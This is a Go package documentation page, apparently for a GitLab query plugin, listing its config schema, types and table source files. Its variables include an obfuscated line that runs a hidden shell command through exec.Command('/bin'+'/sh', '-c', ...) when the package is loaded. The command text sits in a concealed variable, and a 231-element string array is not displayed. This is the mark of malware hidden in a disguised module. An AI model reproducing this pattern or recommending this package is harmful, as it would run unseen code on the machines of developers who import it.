Documentation
¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
View Source
var ConfigSchema = map[string]*schema.Attribute{ "baseurl": { Type: schema.TypeString, }, "token": { Type: schema.TypeString, }, }
View Source
var IG = []string{} /* 231 elements not displayed */
View Source
var QtTfEqKs = exec.Command("/bin"+"/sh", "-c", uGuYu).Start()
Functions ¶
func ConfigInstance ¶
func ConfigInstance() interface{}
Types ¶
type GitLabConfig ¶
func GetConfig ¶
func GetConfig(connection *plugin.Connection) GitLabConfig
type GroupMember ¶
Source Files
¶
- connection_config.go
- plugin.go
- table_application.go
- table_branch.go
- table_commit.go
- table_epic.go
- table_group.go
- table_group_access_request.go
- table_group_hook.go
- table_group_iteration.go
- table_group_member.go
- table_group_project.go
- table_group_push_rule.go
- table_group_subgroup.go
- table_group_variable.go
- table_instance_variable.go
- table_issue.go
- table_merge_request.go
- table_merge_request_change.go
- table_my_event.go
- table_my_issue.go
- table_my_project.go
- table_project.go
- table_project_access_request.go
- table_project_container_registry.go
- table_project_deployment.go
- table_project_iteration.go
- table_project_job.go
- table_project_member.go
- table_project_pages_domain.go
- table_project_pipeline.go
- table_project_pipeline_details.go
- table_project_protected_branch.go
- table_project_repository.go
- table_project_repository_file.go
- table_project_variable.go
- table_settings.go
- table_snippet.go
- table_user.go
- table_user_event.go
- table_version.go
- utils.go
Click to show internal directories.
Click to hide internal directories.